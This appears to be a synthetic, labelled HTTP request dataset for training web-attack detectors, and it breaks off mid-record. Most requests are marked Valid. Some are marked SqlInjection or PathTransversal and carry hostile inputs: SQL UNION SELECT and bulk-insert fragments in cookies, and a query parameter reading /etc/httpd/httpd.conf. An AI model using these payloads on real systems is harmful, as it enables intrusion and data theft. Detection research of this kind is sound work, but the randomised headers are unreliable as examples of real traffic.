GET /r8IzqR7vKGm1wZQ4@H/ogxmlcmd/sejrNebeirorw/ePn_OgY1WaBNHRUEKvV/sty5c6sv1XzKb/e6Ah148xS/ipAhc_YK/lebT/bXvWGT/mZAuxESca9zUTvxtAI@.msf?eiedm1=eZHD&ecrndsvgbe=1&mailwDZFgZP-YnS=6vq%40vc2xz&nomorORnUpr=ai8sHoa%7EseISdey&acn9elmnaoh=iTo1PWh&hk4xhs2=ssg2&cme8Sw=m%28jk&veaihswhvlpIa=93195256&Jtqnsj=6He%40+8texecw+location1&Gt4-.w5=yFhV&eit8tatRo=77922455&czdetTdraiiNit=%26h%7C HTTP/1.0
Host: 186.203.107.72:8916
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-15, iso-2022-kr, windows-1251
Accept-Encoding: compress
Accept-Language: neFd5-etf, ae-siaea;q=0.7, yc-e;q=0.3, smEi-0bemEmiu;q=0.2
Cache-Control: only-if-cached
Client-ip: 171.208.141.15
Cookie: 7i3eAexeL=yotuqittAokhrii;ei2mpdRdb9sl=ta6E563Vd3n;wsciglaD0rewat=r]1replaceall4;rb
Cookie2: $Version="87"
Date: Fri, 05 May 06 23:13:50 UTC
ETag: W/"ie@PXceKiLklB@KxHR"
Expect: 100-continue
From: tssvageg@eeennrsgE.biz
If-Modified-Since: Mon, 12 May 08 06:03:12 GMT
If-Unmodified-Since: Mon, 25 Aug 08 11:19:49 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic bGhzOGE6dGEyYQ==
Authorization: Basic aWRmcGpkaTp3bXlub2Fw
Range: 71-
Referer: /dzcvvea/edap/nple/giEt/6csDe4e.txt
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: 1tjvce/0.1.3.5.7
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 325x832
Via: 1.4 134.8.168.235
Transfer-Encoding: znde
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 049 123.7.85.200 "mlamcdeAKhFn" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29118
Start - Id: 12058
class: Valid
GET /ikas/rselectFC/oraiteeet/cngAzVGuyK99N4YE/pLbfzb711BVBI/pC28pRrAmgIYNh.php3? HTTP/1.0
Host: 137.29.160.228
Connection: ayean
Accept: audio/x-wav;q=0.1, text/xml
Accept-Charset: utf-8;q=0.4, windows-874;q=0.1, shift_jis, x-mac-japanese, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 136.168.150.37
Cookie: b5id3vaayse=nSJBOhr
Cookie2: $Version="7"
Date: Fri, 09 May 08 20:41:20 CET
ETag: W/"fFsX_cbNy2W@DxWYxgk"
Expect: eaa2eh
From: oO9gna@trdjI.biz
If-Modified-Since: Mon, 29 Dec 08 02:06:29 GMT
If-Unmodified-Since: Sat, 02 May 09 08:55:45 CET
If-Match: *
If-None-Match: ".6t.kQKH3HCLQu."
If-Range: Sun, 02 Jul 06 05:21:04 UTC
Max-Forwards: 9982
MIME-Version: 2.2
Pragma: aogayh='ior'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: Basic bThBc3NlZXk6ZW5sdA==
Range: 2571-
Referer: /eerww/sehi/heet.php4
TE: chunked;q=0.3,deflate;q=0.0,trailers
Trailer: TE
User-Agent: hdtr (mVpUCw; e_n5V9; qpVxVXa; avgQ1VJ-kO)
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 4.5 210.38.116.3:4587
Transfer-Encoding: deflate
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 337 www.ns3txq.css "cRiegpe2onof3lwdtrnr" "Sun, 27 Aug 06 07:07:45 CET"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12058
Start - Id: 24192
class: Valid
GET /tyhA/otthi1hauOaa1.shtml?ewRpgTrS=sVquaM9gC&hton=xsEegkrrTh&2us0pnR=tp2%2F%3Dl7nEae&fmqeogrc=cdqae27s&t1ee=roibetweentssldEco4erechoy&qKbtr4x-mY=ien_Jrzyn&nDngzlsbriI=%7Ebtaps+eivbscriptersystemne&saae5oa4Nliuaxa=sh2n&nt8hyhtecd=f9libr-nrcdinput6+tperl&am=i8udYeyJ&deuOoeremredsm=97&vhlo4git6ija=dAzh&IxcLzF0Nposition=518424688&ah=7692975&ssmp=791371 HTTP/1.0
Host: 125.165.215.141:6
Connection: 7rnvat
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: taes8ig4-oi
Cache-Control: no-store
Client-ip: 240.233.81.94
Cookie: Ecatjnehtsub=38490;etx4nt1iscE=8qo;Nrleuii=sloi;tisbIdoursn=9
Cookie2: $Version="64"
Date: Fri, 18 May 07 15:49:12 GMT
ETag: "78o.maQvdTLSGjt"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Sat, 18 Dec 04 12:30:22 UTC
If-Unmodified-Since: Mon, 30 Apr 07 10:09:33 GMT
If-Match: "P3V5T71POWRsHd-RG"
If-None-Match: "tHdzJD8G-dndrq0AA"
If-Range: "PCOZOay2B4OHc9MODwy"
Max-Forwards: 75
MIME-Version: 3.9
Pragma: mtwSots7=cT
Proxy-Authorization: Basic dDJlcnJ0Omp0dWhpeXdU
Authorization: NTLM aWZiT2NwRmFzZmtodG9QbG9kYW50RHM3cmk5bnpuZXM=
Range: 4511-,8-4214
Referer: http://www.ezoioru.uk/gozxneh.mdb
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/0.9 (X11; U; Linux i386 5.5; ao-tt; rv:4.2.1) Gecko/03566130
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: 3.7 160.54.252.146:75
Transfer-Encoding: compress
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 211.126.227.104
X-Serial-Number: 53913
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24192
Start - Id: 40990
class: SqlInjection
GET /z_UlA9Jaso/i3ShbsFUL/edfP/r6emNnig6ihc/lhlheuw1maroLtoeNr.jsp?zJwvK9@2QCA=04935496&e8feXewer0=n9MX8JI&php4.yuminsertsWTc=i87hnr&as=9%3Ao&na4Eeuioe=qbbgsound2ecsivaE+Ao%3D%3Cttdb&aakOrAudiccc=2473010025&ix=ms8L0P&innEuaenwyqais=mCXjhbik&eowaczp7e6=gtr&IiLe3oihTiiic=90&u24=byb&qOH.iMs=ecgPI-&ism9eekHtRhsSnw=l9nf7_RP&sianfroHsO=xf+&Ehcns=S51lir9creetRn HTTP/1.0
Host: 167.26.189.60
Connection: close
Accept: */*;q=0.0
Accept-Encoding: gzip, identity;q=0.7, deflate;q=0.2, deflate;q=0.4
Accept-Language: Hc0tsnts-DmietA, eeandR-z, l-riooi
Cache-Control: only-if-cached
Cookie: pkpperl=td from( marcpmU;t6gI0nsshlree=bulk  insert   es   from   'pwdump.exe'          with   (codepage='RAW'  );nairemsfeto=75471;holiaxodeAto=57810;I2olpaehlkv=tVmRZAPD
Cookie2: $Version="241"
ETag: "gSqPYFCySV-yMA0@9NR"
If-Modified-Since: Wed, 04 Jun 08 09:56:28 GMT
If-Unmodified-Since: Fri, 09 Oct 09 11:36:35 GMT
Authorization: Digest nonce
Referer: http://www.ew1trr.fr/dyn2.php
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 2.6; Ee-rn; rv:4.6.2) Gecko/20157480
UA-Disp: 4063,7438,32
Via: HTTP/4.0 107.240.169.77, 3.4 www.mrlt.jpg:57, HTTP/5.2 209.215.166.77
Upgrade: dise5e/6.7, 1h2feh/2.8, skito9/6.7, edh/5.9

null

End - Id: 40990
Start - Id: 13998
class: Valid
GET /nI/tcCed7hWSTdaluJ8e/yKQX1hdxgoExnfOaiC.png?athandae8ec=57&raCdbsatF7sR=HbfniE8fsg%25daO&mT2=Tttdpeszyyernpu19&sEcbgewheqaee=%27e%40n+e&rld0sIij=7416&uC6N9Yezu=191620&o6jarXaillfr=50870&@U30qEbuW8da=ebetweenv%3Etd%3Dwcak&rsasoI=7172744&qnYgroup byeautoexecPqX6f=stylehe4se%5C%5Deen5h&QaphpAat@RSZ=inputt%25rasugi&i6ag=hsz%25cduddlu6-%3AO HTTP/1.0
Host: 45.19.161.26:80
Connection: udtsuFeh
Accept: */*
Accept-Charset: x-mac-korean, x-mac-greek;q=0.7
Accept-Encoding: *
Accept-Language: osehOIe-hpess;q=0.5, es-9rlg, asrt-cObnoa, vao-edli;q=0.0, wrtbta-jhoab;q=0.5
Cache-Control: no-store
Client-ip: 62.201.111.152
Cookie: atwaIoN=trt;zdheecnz=5p0N1d6;lwcabsnp1dip=9277321199;lt=suvhtn2Eeuesoi;7hnt=7980739;Aincfnsd39x5y=3917250
Cookie2: $Version="0"
Date: Mon, 24 Jul 06 06:13:40 UTC
ETag: "PKj2Hk_f-cVsVCSIONx@"
Expect: 100-continue
From: er5oylr@eeie3.org
If-Modified-Since: Tue, 01 Feb 05 04:44:54 CET
If-Unmodified-Since: Tue, 24 Jun 08 10:55:38 CET
If-Match: "z4rheoAPAWitd7fN7"
If-None-Match: *
If-Range: Wed, 28 Feb 07 23:28:27 GMT
Max-Forwards: 5679
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: rof4t boioiest=ee5udrei
Range: 986633-,-445,64-7061
Referer: http://www.eg2uee.com/wtysHuR.gz
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: nsty (a6UJsnP; dzNC.Kpkf; aTm9KZDC; hWr8P1i-9; r5AtSIzQ)
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 8.7 www.eehyr.js:6247, ln1tt/3.0 1.140.89.68
Transfer-Encoding: identity
Upgrade: fdtec/9.3, yna9n/5.0
Warning: 949 173.10.111.220:0 "1Outi0Ptecll" 
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13998
Start - Id: 10102
class: Valid
GET /lh/hmesn9umosr7/ibhsahhtne/skhCee/tLbdpgWp1Vhqhtyfy3U/eX-J718swhN60/dshimuiraapa9tofs/q2rO/atrarbt/nEpS/s74jThU7_4/dE9haXeaj6otcile.tiff?54xmlureplaced=n6IAl%3Cse&8chwNqbg2AbhsEt=f6dskopewaosa&uni4one=0&Mtie4ey4i3F=oBotoee&geUteyaieyyu=t- HTTP/1.0
Host: www.dUnY.it
Connection: ot1wbh
Accept: application/*;q=0.1, image/gif, audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-age=33576
Client-ip: 55.21.170.164
Cookie: ro5ol=0542707;echoGamail=<ieeh s
Cookie2: $Version="5"
Date: Mon, 05 Dec 05 21:44:33 UTC
ETag: W/"mTcBSBHlhC3s6Y6x"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Thu, 19 Feb 09 05:53:24 UTC
If-Unmodified-Since: Wed, 23 Aug 06 13:54:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 978
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: NTLM cDE4TGUyb2hDcGdzaWNlZWZ0TGw0ajFvZnQ4dW9vaWVvbnlh
Range: -4,998277-
Referer: /dgersdT/gmtoo/ihxhv.tar
TE: gzip;q=0.1,trailers
Trailer: If-Match
User-Agent: a6oh0Ce2oTnet
UA-CPU: x86
UA-Disp: 886,964,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9723x8891
Via: HTTP/6.7 111.67.200.23
Transfer-Encoding: deflate
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10102
Start - Id: 7370
class: Valid
POST /CMyB/6OUDA2tk/r0cAdt3irxsOsseennth.exe? HTTP/1.0
Content-Length: 70
Content-Language: ayntme3,eaueytru,iHtto
Content-Encoding: compress
Content-Location: http://www.vOoO.biz/s1sitel/rHsthaet.htm
Content-MD5: aGdlbUozc2llcndvbmxhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Nov 04 21:40:50 GMT
Last-Modified: Sat, 15 Nov 08 17:55:59 CET
Host: 130.201.182.42
Connection: close
Accept: audio/x-wav, video/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: rbtvonsn-6noeii;q=0.7, usnYsbr-Ncci;q=0.5
Cache-Control: aDroahx='c'
Client-ip: 72.69.107.176
Cookie: fHbtu.Uall8= go2;Hr=gse+se2ewm9d;em=nn2o;sovhyases5h4z=uu'jae;Mea=90195
Cookie2: $Version="8"
Date: Fri, 12 Mar 10 16:49:17 GMT
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: u1ri@gtgRegf.biz
If-Modified-Since: Mon, 19 Nov 07 16:06:49 GMT
If-Unmodified-Since: Thu, 16 Feb 06 09:31:25 GMT
If-Match: "8BNxFGj-3TGyxkyokF"
If-None-Match: *
If-Range: Thu, 30 Aug 07 01:10:44 GMT
Max-Forwards: 12
MIME-Version: 3.6
Pragma: yggstr8a='saekn'
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: Digest nc=Ee180baC
Range: -69050,-4,502550-
Referer: http://u6ecnfyg.biz/ehedarw3.htm
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: egyohegee (tfmzZOvlBw; tEvdPV.AE7; bnvBWps; r7JQn.sOVI)
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 850x401
Via: 1.2 223.49.137.15, 0.3 www.rrrrrobD.jpg, HTTP/2.8 17.142.92.49:31690
Transfer-Encoding: compress
Upgrade: Tcl/1.4, hde/4.4, fe2s6/8.8, prra/7.3, ta2/1.0
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 114.0.180.179
X-Serial-Number: 33978029627174385263
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hg6Ioh=?llaeqe rp2&n2lSHu=2&an8asne=117934542&92LYxterm=716694&ni=17

End - Id: 7370
Start - Id: 18070
class: Valid
GET /UM3qske00iF.htm?tyhes=09730 HTTP/1.0
Host: 129.169.1.145
Connection: tgie
Accept: audio/*;q=0.5, video/quicktime
Accept-Charset: iso-8859-3, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: slctlCf-wRsnin;q=0.9, rrl-thle49tu;q=0.7, xP-smttB;q=0.0, zElesh-ejlti26
Cache-Control: no-cache
Client-ip: 211.175.152.169
Cookie: w81n=ohuo;zK7lsopen5plikeGW=nmmanano
Cookie2: $Version="02"
Date: Thu, 04 Dec 08 03:42:54 UTC
ETag: W/"NZxbFVmdZTGr7PoD63-"
Expect: 100-continue
From: bkly@gN1itutinI.de
If-Modified-Since: Tue, 09 Sep 08 07:56:56 UTC
If-Unmodified-Since: Sat, 01 Apr 06 12:44:48 UTC
If-Match: "u-V6uB1mbq@@.Td0wj"
If-None-Match: *
If-Range: "wme5B43QYs31S0-"
Max-Forwards: 7200
MIME-Version: 3.6
Pragma: nbotuitk=vu4ey
Proxy-Authorization: Basic TjVob3YybjphdHRpYmRhbw==
Authorization: weeioc rtmr=thTt
Range: 955815-429,91164-5504
Referer: /Oeiirhus.nsf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.1 (X11; U; SunOS sun4u 9.1; do-1s; rv:7.8.0) Gecko/57748607
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: HTTP/4.3 27.245.83.77, HTTP/1.1 211.40.93.29
Transfer-Encoding: edSt; aeAsm1=ysgnEw
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 734 www.ernreSI.shtml "fig7ndengta3" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18070
Start - Id: 18560
class: Valid
GET /Omgogtljox0sEot.mdb?emkEgmddAs=gstdin%22axeovt&ldg=bVS&gwor4=ndhRoh%3Feaa%7E&aeIlecs7pOoes6u=9&oRSgt6r=eh3r&NVb.LTB=ooettn5gle%5D%28wls8Bd5l HTTP/1.0
Host: www.esn5t3owme.de:79541
Connection: i70n
Accept: */*
Accept-Charset: iso-2022-jp;q=0.4, iso-8859-9;q=0.5, iso-8859-6;q=0.9, utf-8;q=0.1, iso-8859-15;q=0.4
Accept-Encoding: 
Accept-Language: h4E-Doi, e-cTn;q=0.9
Cache-Control: aeO=mo7T
Client-ip: 3.185.87.84
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="26"
Date: Tue, 23 Sep 08 17:23:53 UTC
ETag: "GDJTF8vTAvm33lGvq"
Expect: 100-continue
From: 2dHy@nMyaaotcd.gov
If-Modified-Since: Sat, 21 Mar 09 23:19:00 UTC
If-Unmodified-Since: Sun, 15 Jun 08 11:41:31 CET
If-Match: "NqFjX4uSqnMFuu3"
If-None-Match: *
If-Range: Mon, 09 Feb 04 06:51:02 UTC
Max-Forwards: 869
MIME-Version: 3.4
Pragma: xo1n='e8l'
Proxy-Authorization: NTLM Y3RsaWRkdGFlZGdyb3NGZG9lY2VybmVuaGVlcGVpcmR1c0FoQ0ZzZw==
Authorization: motee xsdssncT=igotyq
Range: 0618-,-84
Referer: http://www.e37jmss.be/ndx8npca/elnhud.mspx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: gthehthede/6.7.6.2
UA-CPU: x86
UA-Disp: 973,9699,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5538x3966
Via: FTP/2.6 www.2ohNd7Ov.tiff, 8.6 www.nio6.tiff
Transfer-Encoding: r9hs; SFlhlel=eSsonta
Upgrade: svA/8.9, rna/8.3, dcaeq/7.5
Warning: 513 176.80.122.103 "ratxspswAeSs" "Sat, 28 May 05 09:22:11 GMT"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 507234397267768
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18560
Start - Id: 46227
class: PathTransversal
GET /gkD.GASEeJvXXD.ACLu/aogscsneS/eaetxkruffe/H0e0atej0ooamHb/tdrhtadsnutrhrnth/lmee903uscou8tt/7sTSAHhnl.php3?itoymfhklepea=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.0
Host: 10.140.3.55
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 213.219.44.194
Cookie: urotbmx=th~st;d3NHQ=5302077574;P5vjL=dnsyeaodd8=
Cookie2: $Version="374"
Date: Sun, 28 Feb 10 18:03:17 GMT
ETag: W/"T3S71sqPNBzZRCk"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Mon, 12 Oct 09 22:16:56 GMT
If-Unmodified-Since: Wed, 28 Feb 07 17:46:45 CET
If-Match: *
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Mon, 29 Jun 09 21:43:41 GMT
Max-Forwards: 733
MIME-Version: 1.9
Pragma: tinn2l=e
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /aooa/hyoeu/tttC.pdf
TE: chunked;q=0.4
Trailer: Accept-Language
User-Agent: a3xFxru http://www.d6qe.de
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: usorpa
Upgrade: Rorl/3.3, 6hT9/1.0, r7sS/3.9, ete/1.9
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46227
Start - Id: 42762
class: SqlInjection
PUT /sgHouv8/9NY_3HVXvar_X/hrvFkGHtxshiDJhA/jRGXcM_xXTYkd/Ur/iKt/obqHb5OK/nAECqlW10oxGt39t6/nA-hppfigpZ@d@JYU8/atcmaeu/afzm6QPs5HOAS6rFPCO/nIboeetZotn.png? HTTP/1.1
Content-Length: 214
Content-Language: trecchtv,ijyNetfb
Content-Encoding: compress
Content-Location: http://iOi3iiT.de/eRwe20e/bke4e/otcae.jpeg
Content-MD5: cnl3dm9LY2VjZWp1VHphcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Mar 08 04:54:08 CET
Last-Modified: Sat, 05 Feb 05 22:22:55 UTC
Host: www.mqalef.fr:281
Connection: nehuwti
Accept: */*
Accept-Charset: koi8-r;q=0.1, windows-1251, iso-8859-4;q=0.8
Accept-Encoding: identity, deflate;q=0.3, identity;q=0.2, compress;q=0.7, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 246.238.255.192
Cookie: pnrelss9tnhT=882651;siLSuiRE19yiht=o6kY7urz;Dltep6cinnk=9k;flttcn=chairs'   UNION     SELECT  ariwa0  FROM     dba_users    WHERE   name   like     '%25;e0gn=n&
Cookie2: $Version="019"
Date: Thu, 31 Dec 09 05:09:18 GMT
ETag: W/"2dDn6yTTh@wCW2p_"
If-Modified-Since: Fri, 22 Jan 10 06:40:40 UTC
If-Unmodified-Since: Mon, 26 Mar 07 04:38:04 UTC
If-Match: *
If-None-Match: "KWacHlrrXmmS.Xq0"
If-Range: *
Max-Forwards: 8396
Pragma: no-cache
Authorization: L34eso Era8droa=rosit
Referer: http://www.mimo.org/einx/neeuolga.dll
TE: trailers,deflate;q=0.4,deflate;q=0.3
User-Agent: nio5kniodi/5.3.5
UA-Color: color32
UA-Pixels: 648x107
Via: FTP/4.2 95.24.11.164, frmtke/4.3 www.l4n1wh.htm, HTTP/1.3 49.70.123.173
Transfer-Encoding: oaTnt

@-divnph-N@NtmpVH=714786&tsi=link5l;6&hprocessing-instructionfromin [t5child&ehsotVn3sS=lnpe1snhqqvborh&nn2ofmnkea=TznieuiegilnetEkl&ael=lr-K2UVvCO.&eingwulubrfaoz0=8diOonmrrulg&hwjmetHwmp9e=A-rcp\&k@jq=689

End - Id: 42762
Start - Id: 700
class: Valid
GET /ohb5/g-osvkdivstP9iJxrm/5VgLgNz3ZuBwzx.jpeg?N6ueeol=2&Ed=4381944&8UE7wgetMvKO6processing-instructionW=58&temoliteyio=ge&bnpseanNioreo=st&e4aeet8enEleep=Nlho+l%3Fseas&d3ndArjb3it=%24Geco+ijwhere&PbSU=tl5DMqjoh3otbh&untaT5EbsDhty=nrRce&-CrL=laomtreeitun&pxt3=susu6na%26eiGehoC&rtj2krit3ahor=assDaeq%7C&ZbVvarY=hssliae%26oo%26mdt%2F+nu&eeedde33ridlmt=38573233&iacu16th=fhd HTTP/1.0
Host: www.unw9qt.net:7
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e9-kx
Cache-Control: max-age=605
Client-ip: 60.58.240.147
Cookie: connectLn3hNXP=nJhWmT4sLhcK
Cookie2: $Version="46"
Date: Mon, 05 Apr 04 12:15:30 UTC
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Sun, 14 Mar 10 19:05:16 GMT
If-Unmodified-Since: Wed, 01 Jul 09 14:36:51 CET
If-Match: "6qzZ.Iq3IV4cYsm"
If-None-Match: *
If-Range: "_k7m.grSI54ZfVU"
Max-Forwards: 70
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBibm1zb3I3aDlSb2FpbFlycWVla2lmRTVkZXFhcnVvc3dpMkQ=
Authorization: Digest qop=auth
Range: -61
Referer: http://llzosris.it/mrgcd/a2om/eNkss5R/slilc/sdeaEe56.msf
TE: trailers
Trailer: From
User-Agent: eiiinlMpnk/7.8.6.4
UA-CPU: x86
UA-Disp: 047,845,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 312x096
Via: HTTP/3.4 www.ea2t9A.jpg:5, HTTP/9.5 www.itino.jpg
Transfer-Encoding: oaTec
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 194 84.41.126.122 "mdoaa2i1" "Thu, 12 May 05 04:17:10 CET"
X-Forwarded-For: 26.52.16.97
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 700
Start - Id: 26019
class: Valid
GET /iURAV/JQAdelete7k/5yoIXS2A@G5lo-4HZ9qr/6YHdQsduB/o7b/aOYJbaNVF0Pr4A_45eE/ec6ho9huriEgH.php3?eru=980489&urhlqasr=t&eotuwippoehem=i%25cUnn&na=4765815&iSdg=2&tnoamki=272249&ihu94lo=passthrusyE&otna=tni&wt=oelezrtOs6aUoaWah HTTP/1.1
Host: www.irvwtonw7.gov:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.6, x-mac-japanese;q=0.3, iso-8859-5;q=0.6, koi8;q=0.9
Accept-Encoding: deflate, gzip;q=0.1, gzip, compress;q=0.5, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 157.41.225.239
Cookie: v_gZEbody5m=mPnFOXCUu;tinXmaut=girlcsayIshtiodgfm;djgibtl=56331451;csdecp5ttoni4=8123;ai=1>meohttt
Cookie2: $Version="7"
Date: Thu, 21 Oct 04 18:29:18 UTC
ETag: W/"2Z@8jn@K098vvdP_8cU"
Expect: 100-continue
From: nchut@r3st.it
If-Modified-Since: Fri, 27 Feb 04 22:02:55 UTC
If-Unmodified-Since: Fri, 18 Aug 06 08:42:58 CET
If-Match: "h4mZTw803c3yNdGe76xu"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: ha9a9 sng2=r8fS
Range: 93614-
Referer: http://www.nqA6aiiA.gov/nrTxto/Wulr/Ehwnthtt/rr2cr/jndh0.ace
TE: deflate;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 1.6; eo-oN; rv:8.2.7) Gecko/63767141
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8535x949
Via: 6.7 www.otzas.js:9370, 7.0 212.178.216.143, 4.1 www.aaefa.css
Transfer-Encoding: compress
Upgrade: yuk/5.7, RisS/8.9
Warning: 578 216.112.216.157 "mtdt" "Thu, 22 Apr 10 15:51:14 GMT"
X-Forwarded-For: 146.141.9.10
X-Serial-Number: 6743288486222977
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26019
Start - Id: 34446
class: Valid
PUT /ajFX2lSp39kmXskdmf/euHcoVqKNQrsVjFDbd/osNaDndCqiant/G_p13ASEWxandUsjF/nreP3nerrmre/ezran7b.Fq9.cRO.4/PoJGNNQCNaF44/de/nbe/uafenrui1bi9m.png? HTTP/1.0
Content-Length: 75
Content-Language: a,j,fttpoteL
Content-Encoding: compress
Content-Location: http://namn.de/drooebea.php
Content-MD5: ZWVvZDRyaWx0aXN0cmVkTg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Dec 08 16:24:29 UTC
Last-Modified: Thu, 26 Feb 09 19:14:45 CET
Host: 23.83.17.133
Connection: close
Accept: image/gif, audio/x-wav, application/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 201.164.185.17
Cookie: xa1ietemctd=hr8ueecn2tDepnefkn;hnauea=7114460105;tio3ttsN=ar samwinsertnw]rif;iksat5a4a=utdg
Cookie2: $Version="7"
Date: Tue, 17 Feb 09 17:20:44 UTC
ETag: W/"VTVxaOMxcvF7Rcul"
Expect: 100-continue
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Wed, 05 Sep 07 05:19:36 GMT
If-Unmodified-Since: Sun, 28 Nov 04 17:52:19 GMT
If-Match: *
If-None-Match: "MN@swwoxmfehQsva"
If-Range: "_dqyU.Zq_N8@nq3Mk"
Max-Forwards: 5174
MIME-Version: 1.6
Pragma: ir='8tteomt'
